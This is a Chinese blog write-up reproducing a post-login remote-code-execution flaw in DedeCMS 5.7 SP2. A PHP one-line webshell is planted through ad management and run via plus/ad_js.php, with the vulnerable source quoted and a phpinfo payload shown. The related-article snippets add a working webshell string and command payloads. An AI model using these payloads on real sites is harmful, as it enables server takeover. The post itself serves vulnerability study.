Dedecms 5.7 SP2后台广告管理处getshell

最新推荐文章于 2024-03-24 18:17:21 发布
最新推荐文章于 2024-03-24 18:17:21 发布
阅读量3.5k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: cms shell 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43457035/article/details/119483899
版权

Dedecms 5.7 SP2后台广告管理处getshell

dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/

1、搭建成功,后台管理系统

在这里插入图片描述

2、进入后台后,找到广告,新增一个广告

在这里插入图片描述

3、填写广告内容,嵌入一句话木马

在这里插入图片描述

4、提交,抓包,发现添加成功

在这里插入图片描述

5、查看广告代码,有相应的地址 /DedeCMSv5/src/plus/ad_js.php?aid=3

在这里插入图片描述

6、访问,并查看页面源代码

http://127.0.0.1:82/DedeCMSv5/src/plus/ad_js.php?aid=3

在这里插入图片描述
在这里插入图片描述

7、查看代码ad_js.php

<?php
/**
 *

 * 广告JS调用方式
   *
 * @version        $Id: ad_js.php 1 20:30 2010年7月8日Z tianya $
 * @package        DedeCMS.Site
 * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
 * @license        http://help.dedecms.com/usersguide/license.html
 * @link           http://www.dedecms.com
   */
   require_once(dirname(__FILE__)."/../include/common.inc.php");

if(isset($arcID)) $aid = $arcID;
$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : 0;
if($aid==0) die(' Request Error! ');

$cacheFile = DEDEDATA.'/cache/myad-'.$aid.'.htm';
if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )
{
    $row = $dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$aid' ");
    $adbody = '';
    if($row['timeset']==0)
    {
        $adbody = $row['normbody'];
    }
    else
    {
        $ntime = time();
        if($ntime > $row['endtime'] || $ntime < $row['starttime']) {
            $adbody = $row['expbody'];
        } else {
            $adbody = $row['normbody'];
        }
    }
    $adbody = str_replace('"', '\"',$adbody);
    $adbody = str_replace("\r", "\\r",$adbody);
    $adbody = str_replace("\n", "\\n",$adbody);
    $adbody = "<!--\r\ndocument.write(\"{$adbody}\");\r\n-->\r\n";
    $fp = fopen($cacheFile, 'w');
    fwrite($fp, $adbody);
    fclose($fp);
}
include $cacheFile;

8、进入hackabr环境,添加postdata,nocache=1&123=echo ‘–>’;phpinfo();

(此处省略较多代码审计过程,其中123是前面一句话木马的密码)
在这里插入图片描述

9、经验告诉我们,执行代码后,写入的“恶意“代码文件存放之/data/cache目录下

在这里插入图片描述

10、找到这个文件,用菜刀连接,连接成功,成功拿下shell

在这里插入图片描述

晓霞1111
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache的网站配置目录_网站后台getshell的方法总结
weixin_39977776的博客
11-06 547
方法一:直接上传getshelldedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9799
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
GETSHELL方法总结上
最新发布
hellodaoyan的博客
03-24 1757
渗透的总步骤1.信息收集找到弱漏洞2.漏洞挖掘 漏洞验证3.有一定权限 getshell4.提权后---渗透5.内网渗透】
dedecms 5.7后台拿WEBSHELL
weixin_33991727的博客
03-31 334
由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名, 导致直接写入webshell漏洞。 漏洞测试: 1、进入后台,默认的是dede www.xxxx.com/dede 左边导航栏目,选择模块>辅助插件>文件管理器 (系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传) 如上图:文件名称随便填,例如1...
dede ad_js.php getshell,Dedecms 5.7 SP2后台getshell
weixin_27219587的博客
03-29 212
Dedecms 5.7 SP2后台getshell"努力学习才能走上人生巅峰" ——周树人前言最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址:http://www.dedecms.com/products/dedecms/downloads/复现...
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1633
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
管理后台UI.rar_dedecms_dedecms后台新样式_dedecms和ui
09-24
dedecms 经典样式,二次开发
DEDECMS5.7星星评分插件
04-30
DEDECMS5.7星星评分插件,适用于dedecmsv5.7版本的织梦星星评分插件
DedeCMS后台管理系统会员登录模板源码.rar
01-29
DedeCMS后台管理系统会员登录模板源码
后台shell全集
05-14
后台shell全集后台shell全集后台shell全集
织梦万能广告,功能强大广告位管理插件下载
02-28
织梦万能广告,功能强大广告位管理插件下载
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5176
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 949
dedecms后台sql命令写入一句话
另类dedecms后台shell
weixin_30412013的博客
05-15 490
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 转载于:https://www....
DEDECMSSHELL EXP
收集盒 Book box
09-05 945
此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell 因此大家一定要养成使用DEDECM建站时改后台名字的习惯。 MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTI
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 485
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
百度站长平台“爆”dede后台直取webshell
IT技术宅-北方的刀郎
03-21 2215
百度站长平台“爆”dede后台直取webshell2013-09-08      0 个评论       作者:Rieck收藏    我要投稿利用百度站长平台找出5W“dede核心”站点,如果有技术的HEI,KE,可能把这5W条的网址给你就OK了,但我们这些低级的“小HEI”只会一些简单的注入,有些时候会遇到“账号密码”全部搞定了,但找不到后台这种事情,什么后台扫描工具用了一大堆,但还是找不到后台
dedecms5.7sp2安装
08-14
dedecms5.7sp2安装的步骤如下: 1. 首先,你可以在自己的电脑上安装织梦dedecms进行网站后台的熟悉以及站点的建立、调试。 [1] 2. 下载织梦dedecms安装所需的工具,并按照教程一步步进行操作。 [1] 3. 安装完成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值